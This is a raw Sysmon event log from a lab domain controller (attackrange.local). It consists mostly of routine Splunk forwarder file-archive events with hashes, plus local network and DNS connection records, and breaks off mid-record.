16:55:07.795{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002243559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:07.775{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30F9702B216A4000251B7EB2FB5433D4,SHA256=9D36DC88B2C0315CEB9F757C4E117B0B007996AE4E2531681034742E8724D894,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:07.420{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FB7F29149FAB150A0F0D2991BA04B40,SHA256=6E922714908EF74A646EDC5136B2D40F857ECC2C3AE48DF9768EF33F34CD826E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:08.436{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01852BBB355C0A4E47FE34A542EDC791,SHA256=502872DBFE9764A966DFE3EC17B254F3CB315A793AD38E0D831390B9FD8CBA82,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:59.318{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60165-false10.0.1.12-8000- 23542300x80000000000000002243565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:09.470{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BF01087B51B53990E40B427EF5C46F9,SHA256=CB963AF02251343E8F4B5E87FC5FDD7BC09717BAB4393D84BB68F5E75E444CE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:09.175{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B2C3BB9CEA03A34F3D5C861DA0E61E0,SHA256=93C569B1485C7B800E2F29D169012295D0596995E4F26F66FE9D70C7067F210A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:10.498{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3BB6591945894F3EE42BAD95C7EC199,SHA256=B4380298A3F45DA681EB3D87DC002994F0CE9BED0C02FF1AB2423D57A74D635E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:11.564{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8982C8454F538EF2A78826163765C487,SHA256=5564E4F27D93DB92FAF6D2C7BEF3B8CB328C98373AEC0457D28A937BA54C36D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:12.592{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16C76C142CB1A137A16D8C4F5EFA71AB,SHA256=4E9D1A20C944E0B908537888A0439EAE8A669ACB19D16367BD97B390B2E9994D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:12.358{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E25122FAE17D23D39DE887B32C93A2D8,SHA256=AD9E922913F31CE86B5E139E4292DE0C51BA4400BA761D02399CBB82157E882F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:11.998{05ADC7E1-229F-6039-1100-00000000AD01}1152NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=634BA42E36434BA0DAD16257154840FD,SHA256=CBF0FB73430B56BBE6BE49EE26BFE90C0B4593974CF2FA90643E655FA9BA3799,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:13.592{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59D9EB89ADBDDDB170855DF8F706E28F,SHA256=16B41E7131D3B4AF1B215E54F94C6049AB20042FAC1322F3B5A4E11959C82118,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:13.375{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32A728E6648D632E932A32D053E1172B,SHA256=B209EAD4E2CDA97942F900D3A65901505F6609159F30D255428E47EB92827629,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:14.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24255BF7428346047FD4FD22979A3595,SHA256=827BFC30EE519CCF6BA73FC31F4A878E960771D85593067DF3E2E53C3DABABEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:14.608{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1719FC7295BCC463BA31FC6FC04D93B1,SHA256=075B6E8D98E0B416433E2ED7D8474644FFCB1340666DFBA7E894653506B8DEF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:15.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E78DD183355F150B5D93A1894326F0E,SHA256=79A54B4958783B600119DDC4D0521273C8CCFC63AFB89D979B9F43A6B5A7ADAF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:05.364{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60166-false10.0.1.12-8000- 354300x80000000000000002243576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.739{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53546- 354300x80000000000000002243581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:05.754{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local53546- 23542300x80000000000000002243580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:16.673{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6475EB71FDDA5D1EAF58A77554884D96,SHA256=B73622CB1190E4675E0F63C591F2024F663547E0BD84F97C17A1E2FE83D03094,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:16.404{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=219F8C2FF4C01FCCE52DADD9940A42CB,SHA256=2B0D00DE63749C69A4FD32A2C0E5AE3BAC9CB5148565F933CA09BDE619613FB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:17.686{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=409F55ACCB995D3285E0A581271D3895,SHA256=CE479205651585C3E139DB6533A7C631E2F5A59A0CBD2C8A76487D24B5417302,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:18.686{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=393EDDD8F8E295EF6455E40D8D66685B,SHA256=0A42CDE00B95EFF9E04B375B8C044F7F09C8B323DC7B682E141E57E3AD308FD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:19.717{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A4174DE9D6F60D6917EEE1E4DFF11B4,SHA256=E3FD7C494FCD28885EA9109892C2AE8885FBC8A2CD0DFA5A237A4CF0580D56A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:20.748{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7648817D8BFD0CFC1D4E67AFC6A8CA8,SHA256=A2E6A1D3CB56DE1F8FAA63424063A11E128523DDD118BA80C48C75C75A2FC8DB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:10.396{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60167-false10.0.1.12-8000- 23542300x80000000000000002243585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:20.275{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C2227A3A33D158D5C03D628476076119,SHA256=F082B5DB643CA8955296BB4AE3BAE44F888E5AF3051FCF16CBEE8FCD466178B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:21.767{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7551C3FE061BDA05D2C4B20C94C4AAB0,SHA256=8FC9C5D084E5890E93ABF2FFC884729C99E446CB0708F0960978D0C3550017A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:22.826{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59E12860274DDC79F9AFECCF343B29C4,SHA256=64AD5731C050A5A2DE5834A71E056CC9E77937B1BC1F879AF17D09A79F1DCECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:22.675{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7030F44426B937948D4CABB692906F11,SHA256=A680FEF22C9C6DAF15E1243B4A305760AD3B05BBEE24ED493F82D09097A85908,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:23.842{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28334D8C58FE948FF0B6B8D3667670DF,SHA256=1F5B78D0761BF07AD827243DFC7405A5F70A82BE1FAE7F5A19D3FCA9DCBB6D53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:24.858{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8042B4B73631CA6031F1EFD8D6841C1,SHA256=AAD3A3FA4D390A3E2B524E219F42E32F85AC0AF76B77013D2D64270071EF7F21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:25.889{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D1BA7B618539D803CAE551D39E00901,SHA256=1691A138F83E8BD5CE705C3EBEDF019A570DF02CF6A9DAD941C613AB6A68D2F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:15.801{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local58322- 354300x80000000000000002243594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:15.411{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60168-false10.0.1.12-8000- 23542300x80000000000000002243593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:25.311{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8143F3E8BC4813E759E6F2C0618008FC,SHA256=13196773D3FADEC3B2EE49D74BBF81357DF53054563F79AA04B81558CA66AE7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:26.920{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4DF11F4872974724A9C48F6DFF98835,SHA256=22E43FE7AA64AC64288E8586AB10E8BA4367A0A806EABC76F9F87267488B74FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:26.675{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71B2DF20C42D00FE8F6C2BA27479D13C,SHA256=7260391994624B26D68A5A7B0BAAD75C7FE4DE49F5E5472B7398C14420583573,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:27.936{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D64DA1845DCE159926827223409570D,SHA256=D6F65919B5D8CC935650C2D13174E0398D37F196B38F10584822E511F943976B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:16.817{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local58322- 23542300x80000000000000002243602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:29.201{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=986C20556D462CFC6BCBD105BB50B169,SHA256=242E9EEF6C62E3BB9CCA33BBDB05994B9AEDCF97C5230B7470FD6ACBF4B253F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:28.998{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0F02FE57843B4589CFCECF1AEB15717,SHA256=57F9575455234C22EA7B7E266CCDB62435D616FE98F8DD75B5B7B085B6EB554F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:30.217{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B1F51267044D28B6DFF4B9A87A6A4D3E,SHA256=61B16413FA7A4442F9A0EA939959BAEE9256018ECC4905CC95339744C1DECAA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:30.064{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9304C8FA062A8DB508FD3AF4457663B,SHA256=8F3B80B25D9E7623E3304BD3DF6540D1165846B11B2DC9770A0E8823859F35B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:31.248{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E81133B7679CD3A76E7DE9D55E9F20DB,SHA256=0D3BDA1E41F30FF6B00E511FEDE190266BBB7BBF6F83CCF1FDE0349A8B3B22D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:31.092{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4B529C4F667921D93CAE533BCA6F162,SHA256=8E544C2AAB1CA9F1CD28EB41C572A62A7E79289F68DD84210579341847332DBB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:20.348{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local54206- 23542300x80000000000000002243610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:32.094{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BD3DE561C39E07DC2ED6B1CECF998A7,SHA256=ED20EB1E038980673B19B2110CCBB05BBFFCEC61C9A1C8A523437A780C64FBFE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:21.363{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local54206- 354300x80000000000000002243608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:21.255{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60170-false10.0.1.12-8000- 23542300x80000000000000002243612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:33.717{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA15D145792D3CD4AC87A2EDB02375B8,SHA256=AC02BA20589910802C8B8F846EBF17B407E677E3674D3DD56B31D13888CCF833,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:33.123{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=980C1548F546C9EAA2650DD03E56DE6A,SHA256=1CF406DFD4331E562F5E1FA1E792B9CD383BA03D18686AD72B39E5559E91D2CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:34.154{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT 